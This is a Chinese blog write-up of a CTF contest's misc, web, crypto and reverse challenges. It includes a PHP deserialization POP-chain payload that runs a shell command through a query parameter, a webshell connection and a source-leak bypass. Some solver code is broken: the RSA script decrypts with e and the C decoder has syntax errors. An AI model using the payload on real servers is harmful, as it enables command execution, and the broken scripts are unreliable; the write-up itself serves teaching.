河南省第五届“金盾信安杯”网络与数据安全大赛线上wp

已于 2023-11-26 23:29:13 修改
阅读量1.5k 收藏 22
点赞数 22
分类专栏: CTF 文章标签: 网络安全
于 2023-11-26 23:27:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52342676/article/details/134635216
版权

目录

Misc​

题目一 来都来了​

题目二 芙宁娜​

题目三 Honor​

Web​

题目四 ApeCoin​

题目五 get_source​

题目六 easyphp​

题目七 ezupload​

Crypto​

题目八 我看看谁还不会RSA​

题目九 hakiehs​

题目十 Babyrsa​

Reverse​

题目十一 RE1​

Misc​

题目一 来都来了​

操作内容:​

拿到压缩包之后发现是伪加密​

将压缩包中的字符base64解密一次缩小即可得出flag​

flag值:​

flag{cp2ae315-eef4-3fra-a768-cd9xb19cdk4e}​

题目二 芙宁娜​

操作内容:​

首先base64解密,得到flag{bc8394aa-7e32-47e8-a9fd-1bf683af​

导入Photoshop拿到覆盖的16进制编码,通过重组还原得到一个pyc文件,​

pyc隐写得到内容:8e8f}​

flag值:​

flag{bc8394aa-7e32-47e8-a9fd-1bf683af8e8f}​

题目三 Honor​

操作内容:​

将拿到的图片放到010中,发现png图片下还隐藏一个jpg图片​

分离 可得到一张jpg图片 图片如下​

接着尝试使用steghide隐写解题,由于不知道密码直接使用空密码,发现尝试失败​

接着使用stegseek对密码进行爆破 ​

密码为114514​

f6l3-a6ag3c}{-bc4c5e28-e4649c76b0-707e6069​

通过栅栏解密即可得到flag​

flag值:​

flag{424c076e-768c-3636-acb5-4676900b9eec}​

Web​

题目四 ApeCoin​

操作内容:​

xray扫一下拿到www.tar.gz源码​

.txt.php是wbeshell​

cmd5解密拿到密码​

74658263​

冰蝎连接拿到flag​

/static/font/.txt.php​

flag值:​

flag{49520cdb-42d2-417f-a1f2-1bc4cd5e1053}​

题目五 get_source​

操作内容:​

php<= 7.4.21 development server源码泄露漏洞​

数组绕过​

a[]=1&b[]=3&pwn[]=sss​

flag值:​

flag{2c256623-af17-419a-ae7d-098b28459ccc}​

题目六 easyphp​

操作内容:​

余暨杯线下赛 | FPoint

<?php​

error_reporting(0);​

class mouse​

{​

public $rice;​

function __construct()​

{​

$this->rice = new get;​

}​

}​

class dog​

{​

public $a;​

public $b;​

public $c;​

function __construct()​

{​

$this->a = 'chance?';​

$this->b = &$this->a;​

$this->c = new ct;​

}​

}​

class ct​

{​

public $fish;​

function __construct()​

{​

$this->fish = new mouse;​

}​

}​

class get​

{​

public $cmd;​

function __construct()​

{​

$this->cmd = '?><?=`nl /realflag/you_want_flag.php`;';​

}​

}​

$b = new dog;​

echo (serialize($b));​

/hint.php?pop=O:3:"dog":3:{s:1:"a";s:7:"chance?";s:1:"b";R:2;s:1:"c";O:2:"ct":1:{s:4:"fish";O:5:"mouse":1:{s:4:"rice";O:3:"get":1:{s:3:"cmd";s:38:"?><?=`nl /realflag/you_want_flag.php`;";}}}}​

flag值:​

flag{75441a2b-7484-496f-9f03-455d83d60a0b}​

题目七 ezupload​

操作内容:​

非预期解:直接访问根目录/flag​

即可拿到flag​

flag值:​

flag{b68d84d6-4125-4f77-a3fe-4a69853bf39d}​

Crypto​

题目八 我看看谁还不会RSA​

操作内容:​

定义了两个大素数p和q,并计算了它们的乘积n。然后,通过计算(p-1)*(q-1)到了欧拉函数的值phin。​

指定了公钥的指数e为37777,并使用gmpy2.invert函数计算了私钥的指数d。​

给定了密文c,代码使用pow函数执行RSA解密操作,将密文c的指数e次幂模n得到明文m。​

使用Crypto.Util.number库中的long_to_bytes函数将解密后的明文m转换为字节形式,并打印出来。​

import gmpy2​

from Crypto.Util.number import long_to_bytes​

# 已知参数​

p = 8666789885346075954502743436174521501697​

q = 2449101960789395782044494299423558347143​

n = p * q​

phin = (p - 1) * (q - 1)​

e = 37777​

d = gmpy2.invert(e, phin)​

c = 8232151627233115772131180151146951323147507324390914513031444555762539986162650​

# 解密​

m = pow(c,e,n)​

print(m)​

plaintext = long_to_bytes(m)​

print(plaintext)​

flag值:​

flag{r5a_Who_w0nt}​

题目九 hakiehs​

操作内容:​

将文件后缀改为zip,找到里面的图片​

原神符号 对照拼接​

flag{linkzeldaganon}​

题目十 Babyrsa​

操作内容:​

求解中国剩余定理。接受两个参数 n 和 a,分别表示模数和余数。函数内部使用了 reduce 函数和 gmpy2.invert 函数来计算最终结果。​

从文件 "round2.txt" 中读取了一个整数 c2。​

定义了两个整数 e1 和 e2,并使用 gmpy2.gcdext 函数计算了它们的最大公约数和对应的系数。​

从 "round3.txt" 中读取了两个整数 key 和 c3。​

定义了两个大素数 p1 和 q1,并计算了 d1,即 e1 在模 (p1-1)*(q1-1) 下的乘法逆元。​

从文件 "round4.txt" 中读取了一个整数 c4 和两个整数 t1、t2。​

最后,使用 GCD 函数计算了 q,然后通过除法运算得到 p。接着,计算了 phin,即欧拉函数值然后使用 gmpy2.invert 函数计算了 d。最后,使用 pow 函数解密了密文 c4,得到了明文 m。​

代码的输出结果是解密后的明文 m。

from functools import reduce​

from Crypto.Util.number import *​

import gmpy2​

n1 = 11177704342647691670070109831808378482821379302566268464943167206480241387551242120970561253786504223799891058773501288553907233379501460184102021531940602831324488818584481982166938165369946708273616214479706319082928159418133324715707808391767322038274030554057692976849636562898606740933056248870247255267420120488136713203337167713048960270135675134979523980774070773134748108563438318851158022122836766753248988837577239024669497444315476147384635493684855045085484618938995056978709390818568630471778630936743950045419782341697342117812959693992029294299582179507853091511833090186389981102903683178276414062363​

with open("round1.txt","r") as f:​

f=f.readlines()​

n1=eval(f[0])​

c1=eval(f[2])​

def chinese_remainder(n, a):#前面是模​

sum = 0​

prod = reduce(lambda a, b: a * b, n)​

for n_i, a_i in zip(n, a):​

p = prod // n_i​

sum += a_i * gmpy2.invert(p, n_i) * p​

return int(sum % prod)​

n2=gmpy2.iroot(chinese_remainder(n1,c1),10)[0]​

c2=eval(open("round2.txt","r").read().strip())​

e1 = 65537​

e2 = 84731​

_,s1,s2=gmpy2.gcdext(e1,e2)​

n3=pow(c2[0],s1,n2)*pow(c2[1],s2,n2)%n2​

with open("round3.txt","r") as f:​

f=f.readlines()​

key=int(f[0])​

c3=int(f[1])​

p1,q1=93354166280947167833539683096118798106084867596287020276555488653205872987859801746684254263516217114159304058632013835768299155560709849272390696591877663191582507890284591155921659833532148373169277734804581509509984633376135064176560954186526127549825077504637255397234250633719215364937275738700717660719,129091985690550359973833790091146198395778087257743694979450863523549458554652043962254166670266232149752471741954493310376155128942738655573094015353022428764487467130494383995010146802193442576035047727380869508672182718103620025385942937912806529910521900966008956204938991394692250823238247503135083004251​

d1=inverse(65537,(p1-1)*(q1-1))​

n4=pow(c3,d1,n3)​

with open("round4.txt","r") as f:​

f=f.readlines()​

c4=int(f[0])​

t1,t2=int(f[1]),int(f[2])​

q = GCD(t1-(t2-2019)**2019,n4)​

print(n4)​

p = n4//q​

e=65537​

phin = (p-1)*(q-1)​

d = gmpy2.invert(e,phin)​

m = pow(c4,d,n4)​

print(long_to_bytes(m))​

在txt文档中出现L,需要删除才行​

flag值:​

flag{y0U_R_th3_ch0sen_on3_1n_the_field_of_Crypt0gr4phy}​

Reverse​

题目十一 RE1​

操作内容:​

载入ida分析进入到main主入口​

使用一个循环来处理字符串v8,将其转换为后缀表达式。循环中的代码将每个字符转换为对应的整值,并进行一系列位运算操作,最终得到一个结果v5​

输入的字符串经过sub_401540通过指针v3向后移动2个字节。 调用sub_401540函数​

对代码进行加密校检代码检查变量v5的值​

验证长度正确后计算v8并将v1和长度传入加密​

将变量v4的值加1,跳过当前字符。​

获取指针v17指向的位置,该位置是根据v3[200]计算得到的。​

将指针v17指向的位置的值赋给变量1。​

将变量v1的值减去指针v17指向的位置的值。​

将v3[200]的值减1。​

将变量v1的值存储回指针v17指向的位置。​

比较后提示内容就是flag​

根据加密算法写转换脚本​

void Decode(unsigned __int8* a1, unsigned __int8* flag, int a2)​

{​

int v3[515];​

int v4;​

char v5;​

int j;​

int v7;​

int i;​

v7 = 0;​

for (i = 0 i <= 255; ++i)​

{​

v3[i] = i;​

v3[i + 256] = *a1;​

}​

flag[0] = a1[0];​

for (j = 1; j < a2; ++j)​

{​

for (i = 0; i <= 255; ++i)​

v3[i + 256] = a1[j - 1];​

for (i = 0; i <= 255; ++i)​

{​

v7 = (v3[i + 256] + v7 + v3[i]) % 256;​

v4 = v3[v7];​

v3[v7] = v3[i];​

v3[i] = v4;​

}​

v5 = 0;​

for (i = 0; i <= 255; i += 2)​

{​

v5 += v3[i];​

v5 ^= v3[i + 256];​

}​

flag[j] = (a1[j] & 0xff) ^ (v5 &0xff);​

}​

}​

int main()​

{​

unsigned __int8 flag[33];​

unsigned __int8 v9[32];​

v9[0] = 99;​

v9[1] = -67;​

v9[2] = 128;​

v9[3] = 86;​

v9[4] = ;​

v9[5] = 76;​

v9[6] = -58;​

v9[7] = -43;​

v9[8] = 68;​

v9[9] = 102;​

v9[10] = 109;​

v9[11] = 44;​

v9[12] =104;​

v9[13] = -92;​

v9[14] = 30;​

v9[15] = 80;​

v9[16] = 25;​

v9[17] = 92;​

v9[18] = -98;​

v9[19] = 65;​

v9[20] -117;​

v9[21] = 85;​

v9[22] = 5;​

v9[23] = 50;​

v9[24] = -65;​

v9[25] = -31;​

v9[26] = 126;​

v9[27] = -6;​

v9[28 = -78;​

v9[29] = -109;​

v9[30] = -10;​

v9[31] = 42;​

Decode(v9, flag, 32);​

flag[32] = 0;​

printf("flag{%s}", flag);​

return 0;​

}

flag值:​flag{ca1acd0c7d7111eeaf0296085339ce83}

池奈飞羽
关注
  • 22
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 8
    评论
专栏目录
河南省第五届金盾信安杯网络数据安全大赛实操技能赛 部分wp(自己的一些思路和解析 )(主misc crypto )
路baby的博客
11-26 1214
河南省第五届金盾信安杯网络数据安全大赛实操技能赛 部分wp 主misc crypto (来都来了,Honor,我看看谁还不会RSA,hakiehs,Font,ApeCoin,Easyphp,Ezupload,get_source)
河南省第五届金盾信安杯网络数据安全大赛-WP
tlp_zzm的博客
11-26 2477
看到该题之后发现是私钥加密,公钥解密脚本代码:n = p*qe=37777。
河南省第三届金盾信安杯网络安全大赛部分wp
七堇年的博客
12-23 3793
河南省第三届金盾信安杯网络安全大赛部分wp
2020金盾信安杯wp
Atkx's Blog
12-22 1245
CRYPTO base 内容:链接: https://pan.baidu.com/s/18oejcVD2ywcSuHo5mqTP1A 密码: hbg4 base64转图片 扫码得 F#S<YReBy{f.WwU{CSv^e^'n*D Base92解码 MISC 注意数字 内容:链接: https://pan.baidu.com/s/14yqufylp_V4iviXUQLm4Nw 密码: k0ji 3 9 仿射密码 小火龙冲啊 内容:链接: https://pan.baidu.com/s/1_Te
第二届金盾信安杯 web wp1-3
giaogiao123的博客
12-22 3140
by 七岁。 web1 考察命令执行 shell命令操作符 基本上过滤了所有可用的命令 平时我们都是ls 查看目录 仔细发现dir命令并没有被禁止 所以我们可以dir%09.%09 也是这样的 . 表示当前目录 然后就是读文件命令 被ban了那么多还有几个忽略了 cut 命令awk sed fmt等等 来看看cut命令 试一试别的 等等,最后payload cmd=cut%09-f%091%09F14g_1s_h4rehaha.php%09 web2 payload: Class W
第四届金盾信安杯.zip
12-18
2022年第四届金盾信安杯题目Misc+Reverse+Crypto
2021-河南省金盾杯-部分题目wp(详细)
02-06
WEB:上传你的头像吧、上传你的压缩包吧、管理员才能拿flag Crypto:Hi There、低音吉他谱、未完成的宣传图 Misc:潦草的笔记、这可是关键信息、hello-world Reverse:Re1、Re2、Re4
2020年12月20日-河南省金盾杯 JDBCTF Crypto+Misc题目打包
12-21
2020年河南金盾杯 JDBCTF Crypto+Misc题目打包下载
金盾全面内网安全与网络行为管理软件(金盾CIS5).pptx
11-12
金盾全面内网安全与网络行为管理软件(金盾CIS5).pptx
河南省第四届”金盾信安杯网络安全大赛writeup(过程,解题思路)
路baby的博客
12-19 3161
河南省第四届”金盾信安杯网络安全大赛writeup(过程,解题思路)Misc-qianda0_Sdoku​编辑 Misc-盗梦空间 Misc-Megmi Misc-数据泄露01-账号泄露追踪 Web-eZphp2 Web-EzPHP Web-有来无回 Crypto-小菜一碟 Crypto-RRSSAA​编辑 Crypto-simpleR
第二届金盾信安杯部分WP
00勇士王子的博客
12-22 441
MISC 注意数字 下载附件,是一张图片 进行binwalk,发现里面有zip, 于是进行foremost分离文件,分离出zip压缩包(我是在Windows下使用的foremost,分离后的文件会放在output中) 双击发现有密码,于是放入WinHex进行分析,发现是压缩包伪加密,改09为00,保存后成功打开压缩包。 (关于压缩包伪加密,这里不详细说了,要注意zip伪加密和rar伪加密方法不同) 获得一个文本文件 猜测为BASE64编码,尝试解码后发现不对,去除开头的b’和最后的’后继续尝试解
第二届金盾信安杯部分wp
doraemon12345的博客
12-21 778
1.注意数字 打开压缩包是个图片,分离得到一个加密压缩包,看似加密实则是伪加密,修正后得到1.txt,是一个多层base64,解密后得到 但是这并不是flag,题目提示注意数字,图片上是李白的诗,有数字3和9,一开始以为是凯撒或者栅栏,试过之后无果,就去查还有哪些移位密码,找到仿射密码比较符合已知条件解密得到flag 2.小火龙 下载文件是个jpg图片放到winhex里查看,发现是png图片,拉到最底部,看到压缩包flag.txt,和pass 手动分离得到压缩包,然后用密码打开得到flag 3.我和十
河南省“第三届金盾信安杯“部分WP
MXPXT的博客
01-05 945
河南省"第三届金盾信安杯"部分WP Crypto Hi There 下载文件,打开发现一串字符,搜索在线栅栏解密,每组字数为4得到flag 低音吉他普 工具(base全家桶):https://github.com/mufeedvh/basecrack 下载文件发现一大串字符用base32解密, 得到字符串用base64解密, 得到字符串用base32解密, 得到字符串用base16解密, [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LMH5BnZh-1641391
第二届“金盾信安杯网络安全大赛misc部分wp
没用的阿吉
02-06 825
文章目录前言一、4位数字二、小火龙三、五瓶药水 前言 全为miscwp 一、4位数字   下载后得到一个压缩包,打开需要密码,文件名已经提示为四位数字,所以直接上ARCHPR进行爆破   爆破拿到密码9156   打开后是两个文件   在路飞的烦恼中直接看到社会主义核心价值观直接解密,贴上解密网址https://ctf.bugku.com/tool/cvecode解密后得到 ++++++++[>>++>++++>++++++>++++++++>+++++++++
金盾杯2022-AGCTFS战队 wp
akxnxbshai的博客
12-20 2366
信安金盾杯,pwn爷(加re)不在,只能打成这样了。
金盾信安杯部分misc和密码题
m0_56194555的博客
12-15 4101
金盾信安杯部分misc和密码题
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8242
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
grpcio-1.63.0-cp38-cp38-linux_armv7l.whl
最新发布
05-28
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
SQLyog-13.1.3-0.x86Community.exe
05-28
SQLyog-13.1.3-0.x86Community
金盾2016s提取工具
07-06
金盾2016s提取工具是一种用于金融行业的数据提取工具。金盾系统是中国金融监管部门开发的一套综合性监管系统,用于收集、分析和监控金融机构的数据。金盾2016s提取工具是该系统的一个重要组成部分,它允许金融机构通过接口或者文件传输的方式,提取他们需要的数据。 金盾2016s提取工具具有以下特点和功能: 1. 多种数据提取方式:金盾2016s提取工具支持多种数据提取方式,包括接口提取和文件传输提取。金融机构可以根据自己的需求选择最适合的提取方式。 2. 数据精确度高:金盾2016s提取工具通过与金融机构内部系统进行数据对账,可以确保提取的数据准确无误。 3. 数据安全性高:金盾2016s提取工具拥有严格的数据访问控制和权限管理机制,保障金融机构的数据安全。 4. 数据提取效率高:金盾2016s提取工具采用高效的算法和技术,可以快速提取大量数据,提高工作效率。 金盾2016s提取工具的应用范围广泛,可以用于数据报送、数据分析、风险监控等多个方面。通过使用这个工具,金融机构可以更加方便、高效地获取所需数据,提高业务运营效率,降低风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

池奈飞羽

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值